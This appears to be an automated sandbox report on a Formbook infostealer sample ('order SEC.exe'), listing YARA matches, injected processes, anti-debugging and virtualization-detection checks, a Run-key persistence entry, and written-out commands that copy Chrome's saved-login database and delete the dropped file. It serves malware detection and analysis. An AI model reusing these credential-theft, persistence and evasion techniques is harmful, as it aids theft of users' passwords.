  4_2_0323A700 NtProtectVirtualMemory
  4_2_0323A710 NtQuerySection
  4_2_0323A780 NtOpenDirectoryObject
  4_2_0323A650 NtQueueApcThread
  4_2_0323A6D0 NtCreateProcessEx
  4_2_0323A520 NtEnumerateKey
  4_2_0323BD40 NtSuspendThread
  4_2_0323A5A0 NtWriteVirtualMemory
  4_2_0323A5F0 NtReadVirtualMemory
  4_2_0323A430 NtQueryVirtualMemory
  4_2_0323B410 NtOpenProcessToken
  4_2_0323A460 NtOpenProcess
  4_2_0323B470 NtOpenThread
  4_2_0323A4A0 NtUnmapViewOfSection
  4_2_00A198F0 NtReadFile
  4_2_00A19840 NtCreateFile
  4_2_00A19970 NtClose
  4_2_00A19A20 NtAllocateVirtualMemory
  4_2_00A1983A NtCreateFile
  4_2_00A1996C NtClose
  4_2_00A19A1A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\order SEC.exe; Code functions:
  0_2_01156812, 0_2_01178800, 0_2_0117989C, 0_2_01178B37, 0_2_0115EB80, 0_2_01165D50,
  0_2_01165D4C, 0_2_01178593, 0_2_01178DA6, 0_2_0115EDA0, 0_2_01178C71, 0_2_011787B9,
  0_2_0115CE20, 0_2_0117962F, 0_2_058AE58A, 0_2_058CE581, 0_2_058BFDDB, 0_2_058CD5D2,
  0_2_058B1DE3, 0_2_058D2519, 0_2_058C1D1B, 0_2_05821530, 0_2_058AC53F, 0_2_05800D40,
  0_2_058D1C9F, 0_2_058D2C9A, 0_2_058C3490, 0_2_058CDCC5, 0_2_058C44EF, 0_2_0581740C,
  0_2_05821410, 0_2_058BF42B, 0_2_0583547E, 0_2_058C2782, 0_2_05825790, 0_2_058D1FCE,
  0_2_058067D0, 0_2_058D1746, 0_2_058C3E96, 0_2_058D26F8, 0_2_05836611, 0_2_05827640,
  0_2_05834E61, 0_2_058CCE66, 0_2_05835E70, 0_2_05836180, 0_2_058DD9BE, 0_2_058C61DF,
  0_2_058D19E2, 0_2_05859906, 0_2_05829110, 0_2_05837110, 0_2_0583594B, 0_2_0581A080,
  0_2_058B18B6, 0_2_058348CB, 0_2_058D28E8, 0_2_05839810, 0_2_058CD016, 0_2_05830021,
  0_2_0583E020, 0_2_05831070, 0_2_05834B96, 0_2_058363C2, 0_2_0580EBE0, 0_2_05828B00,
  0_2_0582FB40, 0_2_058D1A99
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058242B00_2_058242B0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D22DD0_2_058D22DD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C0A020_2_058C0A02
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058DE2140_2_058DE214
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583523D0_2_0583523D
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05834A5B0_2_05834A5B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03218B004_2_03218B00
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0321FB404_2_0321FB40
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03224B964_2_03224B96
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032263C24_2_032263C2
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_031FEBE04_2_031FEBE0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0322523D4_2_0322523D
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B0A024_2_032B0A02
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032CE2144_2_032CE214
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03224A5B4_2_03224A5B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032142B04_2_032142B0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C1A994_2_032C1A99
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C22DD4_2_032C22DD
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032499064_2_03249906
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032191104_2_03219110
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032271104_2_03227110
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0322594B4_2_0322594B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032CD9BE4_2_032CD9BE
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032261804_2_03226180
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C19E24_2_032C19E2
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B61DF4_2_032B61DF
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0322E0204_2_0322E020
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032200214_2_03220021
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032298104_2_03229810
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BD0164_2_032BD016
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0327A8604_2_0327A860
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032210704_2_03221070
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032A18B64_2_032A18B6
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0320A0804_2_0320A080
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C28E84_2_032C28E8
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032248CB4_2_032248CB
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032187404_2_03218740
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C17464_2_032C1746
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B27824_2_032B2782
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032157904_2_03215790
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_031F67D04_2_031F67D0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C1FCE4_2_032C1FCE
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032266114_2_03226611
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03224E614_2_03224E61
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BCE664_2_032BCE66
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03225E704_2_03225E70
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032176404_2_03217640
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B3E964_2_032B3E96
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C26F84_2_032C26F8
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032115304_2_03211530
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0329C53F4_2_0329C53F
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B1D1B4_2_032B1D1B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C25194_2_032C2519
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_031F0D404_2_031F0D40
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0329E58A4_2_0329E58A
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BE5814_2_032BE581
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032A1DE34_2_032A1DE3
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032AFDDB4_2_032AFDDB
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BD5D24_2_032BD5D2
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032AF42B4_2_032AF42B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0320740C4_2_0320740C
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032114104_2_03211410
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0322547E4_2_0322547E
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C1C9F4_2_032C1C9F
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C2C9A4_2_032C2C9A
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B34904_2_032B3490
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B44EF4_2_032B44EF
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BDCC54_2_032BDCC5
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1D83F4_2_00A1D83F
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1C9C94_2_00A1C9C9
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1DAAC4_2_00A1DAAC
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1CA104_2_00A1CA10
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A02D904_2_00A02D90
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1CD474_2_00A1CD47
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1C7A34_2_00A1C7A3
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A02FB04_2_00A02FB0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A09F604_2_00A09F60
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A09F5C4_2_00A09F5C
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: String function: 05895110 appears 64 times
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: String function: 0580B0E0 appears 176 times
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: String function: 0585DDE8 appears 50 times
        Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 031FB0E0 appears 176 times
        Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 03285110 appears 78 times
        Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 0324DDE8 appears 50 times
        Source: order SEC.exe, 00000000.00000002.941067970.0000000005A8F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs order SEC.exe
        Source: order SEC.exe, 00000000.00000002.937569939.00000000030E0000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs order SEC.exe
        Source: C:\Windows\SysWOW64\help.exe	Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
        Source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: classification engine	Classification label: mal100.troj.spyw.evad.winEXE@8/6@2/1
        Source: C:\Windows\SysWOW64\help.exe	File created: C:\Users\user\AppData\Roaming\O2LBPCVF
        Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_01
        Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
        Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\DB1
        Source: C:\Users\user\Desktop\order SEC.exe	Command line argument: ShowDib1 (0_2_011512C0)
        Source: C:\Windows\explorer.exe	File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\order SEC.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\help.exe	File read: C:\Windows\System32\drivers\etc\hosts
        Source: order SEC.exe	Virustotal: Detection: 31%
        Source: order SEC.exe	Metadefender: Detection: 18%
        Source: order SEC.exe	ReversingLabs: Detection: 50%
        Source: unknown	Process created: C:\Users\user\Desktop\order SEC.exe 'C:\Users\user\Desktop\order SEC.exe'
        Source: unknown	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
        Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order SEC.exe'
        Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
        Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order SEC.exe'
        Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
        Source: C:\Windows\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db7cd52-e3b7-4ecc-bb1f-388aeef6bb50}\InProcServer32
        Source: C:\Windows\SysWOW64\help.exe	File written: C:\Users\user\AppData\Roaming\O2LBPCVF\O2Llogri.ini
        Source: C:\Windows\SysWOW64\help.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: order SEC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: order SEC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: order SEC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: order SEC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: order SEC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: order SEC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: order SEC.exe	Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: order SEC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.884724922.0000000007010000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: order SEC.exe, 00000000.00000002.939630418.00000000057E0000.00000040.00000001.sdmp, help.exe, 00000004.00000002.1176829022.00000000032EF000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: order SEC.exe, help.exe
        Source: Binary string: help.pdbGCTL source: order SEC.exe, 00000000.00000002.937569939.00000000030E0000.00000040.00000001.sdmp
        Source: Binary string: help.pdb source: order SEC.exe, 00000000.00000002.937569939.00000000030E0000.00000040.00000001.sdmp
        Source: Binary string: C:\Codes\Version11\SHOWDIB1\Release\SHOWDIB1.pdb source: order SEC.exe
        Source: Binary string: C:\Codes\Version11\SHOWDIB1\Release\SHOWDIB1.pdbyy source: order SEC.exe
        Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.884724922.0000000007010000.00000002.00000001.sdmp
        Source: order SEC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: order SEC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: order SEC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: order SEC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: order SEC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_0115454A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_0116A1F3 push C221422Eh; ret 0_2_0116A1FA
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_011530D5 push ecx; ret 0_2_011530E8
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_011738F1 push cs; retf 0_2_011738F2
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_0117855C push eax; ret 0_2_01178562
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_011784A5 push eax; ret 0_2_011784F8
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_011784F2 push eax; ret 0_2_011784F8
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_011784FB push eax; ret 0_2_01178562
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_01189776 pushad ; ret 0_2_01189777
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_0585DE2D push ecx; ret 0_2_0585DE40
        Source: C:\Windows\SysWOW64\help.exe	Code function: 4_2_0324DE2D push ecx; ret 4_2_0324DE40
        Source: C:\Windows\SysWOW64\help.exe	Code function: 4_2_00A17B01 push cs; retf 4_2_00A17B02
        Source: C:\Windows\SysWOW64\help.exe	Code function: 4_2_00A0E403 push C221422Eh; ret 4_2_00A0E40A
        Source: C:\Windows\SysWOW64\help.exe	Code function: 4_2_00A1C6B5 push eax; ret 4_2_00A1C708
        Source: C:\Windows\SysWOW64\help.exe	Code function: 4_2_00A1C702 push eax; ret 4_2_00A1C708
        Source: C:\Windows\SysWOW64\help.exe	Code function: 4_2_00A1C70B push eax; ret 4_2_00A1C772
        Source: C:\Windows\SysWOW64\help.exe	Code function: 4_2_00A1C76C push eax; ret 4_2_00A1C772
        Source: initial sample	Static PE information: section name: .data entropy: 7.91464332979

        Source: C:\Windows\SysWOW64\help.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CRTT0Z9P0LH

        Hooking and other Techniques for Hiding and Protection:

        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exe	User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xA3 0x35
        Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\Desktop\order SEC.exe	RDTSC instruction interceptor: First address: 00000000011656A4 second address: 00000000011656AA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\order SEC.exe	RDTSC instruction interceptor: First address: 000000000116590E second address: 0000000001165914 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000000A098B4 second address: 0000000000A098BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000000A09B1E second address: 0000000000A09B24 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_01165840 rdtsc
        Source: C:\Users\user\Desktop\order SEC.exe	API coverage: 6.3 %
        Source: C:\Windows\SysWOW64\help.exe	API coverage: 4.8 %
        Source: C:\Windows\explorer.exe TID: 4772	Thread sleep time: -42000s >= -30000s
        Source: C:\Windows\SysWOW64\help.exe TID: 4212	Thread sleep time: -35000s >= -30000s
        Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
        Source: explorer.exe, 00000003.00000000.885398797.0000000007340000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000003.00000000.885398797.0000000007340000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: explorer.exe, 00000003.00000000.885398797.0000000007340000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: help.exe, 00000004.00000002.1175214039.0000000000DC2000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: explorer.exe, 00000003.00000000.885398797.0000000007340000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\order SEC.exe	API call chain: ExitProcess graph end node (graph_0-50169)
        Source: C:\Users\user\Desktop\order SEC.exe	Process information queried: ProcessInformation

        Source: C:\Users\user\Desktop\order SEC.exe	Process queried: DebugPort
        Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_01165840 rdtsc
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_0584A5F0 NtReadVirtualMemory,LdrInitializeThunk
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_01151A41 IsDebuggerPresent
        Source: C:\Users\user\Desktop\order SEC.exe	Code function: 0_2_0115454A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058B1DE3 mov eax, dword ptr fs:[00000030h]0_2_058B1DE3
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D6DFD mov eax, dword ptr fs:[00000030h]0_2_058D6DFD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D6DFD mov eax, dword ptr fs:[00000030h]0_2_058D6DFD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D6DFD mov eax, dword ptr fs:[00000030h]0_2_058D6DFD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058375F0 mov eax, dword ptr fs:[00000030h]0_2_058375F0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058375F0 mov eax, dword ptr fs:[00000030h]0_2_058375F0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05832DF0 mov eax, dword ptr fs:[00000030h]0_2_05832DF0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C0D1B mov eax, dword ptr fs:[00000030h]0_2_058C0D1B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05893D10 mov eax, dword ptr fs:[00000030h]0_2_05893D10
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D952E mov eax, dword ptr fs:[00000030h]0_2_058D952E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583E52F mov ecx, dword ptr fs:[00000030h]0_2_0583E52F
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583E52F mov eax, dword ptr fs:[00000030h]0_2_0583E52F
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583E52F mov eax, dword ptr fs:[00000030h]0_2_0583E52F
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
